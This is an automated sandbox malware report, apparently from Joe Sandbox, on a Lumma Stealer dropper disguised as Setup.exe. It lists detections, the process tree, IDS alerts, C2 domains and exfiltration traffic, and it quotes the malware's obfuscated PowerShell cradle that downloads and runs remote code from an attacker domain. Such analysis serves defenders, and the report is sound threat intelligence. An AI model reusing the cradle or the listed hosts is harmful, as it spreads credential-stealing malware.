Windows Analysis Report
Setup.exe

Overview

General Information

Sample name: Setup.exe
Analysis ID: 1583071
MD5: f24fcf422c2611892a30adf91d85f556
SHA1: 87d13ac981079a41cbaa7df94d82d4818bf49444
SHA256: 3ec2c8a5d04cb1407b981cecd39f2d95f99cfa7e76d4a31f81f23b430feb4da5
Tags: exe, LummaStealer, user-aachum
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample or dropped binary is a compiled AutoHotkey binary
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Setup.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: F24FCF422C2611892A30ADF91D85F556)
    • powershell.exe (PID: 7640 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WPNMSIA79IRF0S6IHRZ7TIDHI.exe (PID: 7868 cmdline: "C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe" MD5: 51F99EDDD33CC04FB0F55F873B76D907)
      • WPNMSIA79IRF0S6IHRZ7TIDHI.tmp (PID: 7900 cmdline: "C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp" /SL5="$20460,7785838,845824,C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe" MD5: F809F51E678B7F2E388F8C969EF902C8)
        • WPNMSIA79IRF0S6IHRZ7TIDHI.exe (PID: 7976 cmdline: "C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe" /VERYSILENT MD5: 51F99EDDD33CC04FB0F55F873B76D907)
          • WPNMSIA79IRF0S6IHRZ7TIDHI.tmp (PID: 7996 cmdline: "C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp" /SL5="$B0060,7785838,845824,C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe" /VERYSILENT MD5: F809F51E678B7F2E388F8C969EF902C8)
            • timeout.exe (PID: 8092 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
              • conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 1880 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 4180 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 3604 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 3704 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 6096 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 7212 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 1344 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 3336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 7308 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 1516 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 6676 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 332 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5816 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 7424 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 2488 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5600 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 2656 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 7556 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 2992 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • BrightLib.exe (PID: 7628 cmdline: "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" MD5: 6A8860A8150021B2D5B9BB707DE4FA37)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["tirepublicerj.shop", "nearycrepso.shop", "abberanteusz.click", "abruptyopsn.shop", "cloudewahsj.shop", "framekgirus.shop", "wholersorie.shop", "rabidcowse.shop", "noisycuttej.shop"], "Build id": "hRjzG3--GAS"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x4eb53:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: Setup.exe PID: 7316 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: Setup.exe PID: 7316 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

              System Summary

              Source: Process started, Author: Florian Roth (Nextron Systems)
              Source: Process started, Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
              Source: Process started, Author: frack113
              Source: Process started, Author: Florian Roth (Nextron Systems)
              Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
              Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
              Data (identical for all six entries):
                Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg
                CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg
                CommandLine|base64offset|contains: ^
                Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                ParentCommandLine: "C:\Users\user\Desktop\Setup.exe"
                ParentImage: C:\Users\user\Desktop\Setup.exe
                ParentProcessId: 7316
                ParentProcessName: Setup.exe
                ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg
                ProcessId: 7640
                ProcessName: powershell.exe
              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2025-01-01T19:04:08.344709+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 172.67.198.102 | 443 | TCP
              2025-01-01T19:04:09.311045+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 172.67.198.102 | 443 | TCP
              2025-01-01T19:04:11.270377+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 172.67.198.102 | 443 | TCP
              2025-01-01T19:04:12.448901+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 172.67.198.102 | 443 | TCP
              2025-01-01T19:04:14.278008+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 172.67.198.102 | 443 | TCP
              2025-01-01T19:04:15.682517+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 172.67.198.102 | 443 | TCP
              2025-01-01T19:04:17.006219+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 172.67.198.102 | 443 | TCP
              2025-01-01T19:04:18.066412+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 172.67.198.102 | 443 | TCP
              2025-01-01T19:04:19.451220+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 185.161.251.21 | 443 | TCP
              2025-01-01T19:04:20.291151+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49745 | 104.21.37.128 | 443 | TCP
              2025-01-01T19:04:08.816400+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 172.67.198.102 | 443 | TCP
              2025-01-01T19:04:09.783359+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 172.67.198.102 | 443 | TCP
              2025-01-01T19:04:18.594781+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49743 | 172.67.198.102 | 443 | TCP
              2025-01-01T19:04:08.816400+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 172.67.198.102 | 443 | TCP
              2025-01-01T19:04:09.783359+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 172.67.198.102 | 443 | TCP
              2025-01-01T19:04:20.680174+0100 | 2008438 | 1 | A Network Trojan was detected | 104.21.37.128 | 443 | 192.168.2.4 | 49745 | TCP
              2025-01-01T19:04:17.558778+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 172.67.198.102 | 443 | TCP

              AV Detection

              Source: https://klipvumisui.shop/int_clp_sha.txtotAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txtPEAvira URL Cloud: Label: malware
              Source: https://cegu.shop/8574262446/ph.txt8QAvira URL Cloud: Label: malware
              Source: https://cegu.shop/HQAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txtR3SFAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/Avira URL Cloud: Label: malware
              Source: Setup.exe.7316.0.memstrmin, Malware Configuration Extractor: LummaC {"C2 url": ["tirepublicerj.shop", "nearycrepso.shop", "abberanteusz.click", "abruptyopsn.shop", "cloudewahsj.shop", "framekgirus.shop", "wholersorie.shop", "rabidcowse.shop", "noisycuttej.shop"], "Build id": "hRjzG3--GAS"}
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe, ReversingLabs: Detection: 52%
              Source: Setup.exe, Virustotal: Detection: 13%
              Source: Setup.exe, ReversingLabs: Detection: 31%
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: rabidcowse.shop
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: noisycuttej.shop
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: framekgirus.shop
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: wholersorie.shop
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: nearycrepso.shop
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: abberanteusz.click
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: hRjzG3--GAS
              Source: Setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000024.00000002.2478739178.00000000386C0000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2453154632.000000000367D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: BrightLib.exe, 00000024.00000002.2478739178.00000000386C0000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2453154632.000000000367D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1931860240.0000000007926000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov edi, dword ptr [esp+30h]0_2_02047756
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 385488F2h0_2_02048786
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 385488F2h0_2_020486F9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov edx, ecx0_2_02049F9F
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov ecx, eax0_2_0204BFB6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then lea ecx, dword ptr [eax-02B62300h]0_2_020387C7
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov esi, ecx0_2_0202EFE0
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov esi, edx0_2_0204AC6B
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov edi, dword ptr [eax]0_2_0205BC76
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then push eax0_2_0205BC76
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [eax], cx0_2_020444F6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+44E006A7h]0_2_0204851D
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [ecx], ax0_2_0203F53C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp word ptr [edx+eax+02h], 0000h0_2_0203ED45
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h0_2_0203ED45
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+00000218h]0_2_02030548
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh0_2_0205ED66
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh0_2_0205ED66
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then test eax, eax0_2_0205ED66
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp word ptr [ebp+ecx+00h], 0000h0_2_02044D96
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [eax], cx0_2_02044D96
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+7BB5E41Dh]0_2_0202D5AC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then lea eax, dword ptr [edi+04h]0_2_020385CF

              Networking

              Source: Network traffic, Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 172.67.198.102:443
              Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.198.102:443
              Source: Network traffic, Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49741 -> 172.67.198.102:443
              Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 172.67.198.102:443
              Source: Network traffic, Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.198.102:443
              Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.198.102:443
              Source: Joe Sandbox View, IP Address: 104.21.37.128
              Source: Joe Sandbox View, IP Address: 185.161.251.21
              Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
              Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 185.161.251.21:443
              Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.198.102:443
              Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.198.102:443
              Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 172.67.198.102:443
              Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.198.102:443
              Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.198.102:443
              Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.198.102:443
              Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.198.102:443
              Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 172.67.198.102:443
              Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.37.128:443
              Source: Network traffic, Suricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 104.21.37.128:443 -> 192.168.2.4:49745
              Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: abberanteusz.click
              Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 77 | Host: abberanteusz.click
              Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=6KMJCXQ2H9KXAAJ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18143 | Host: abberanteusz.click
              Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=LXYTJRBQ03JL | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8746 | Host: abberanteusz.click
              Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=L57N9QSJ23X93STD | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20423 | Host: abberanteusz.click
              Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=JMD9W24D8L9AG | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1237 | Host: abberanteusz.click
              Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=51VOM22OB4VHWV7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1078 | Host: abberanteusz.click
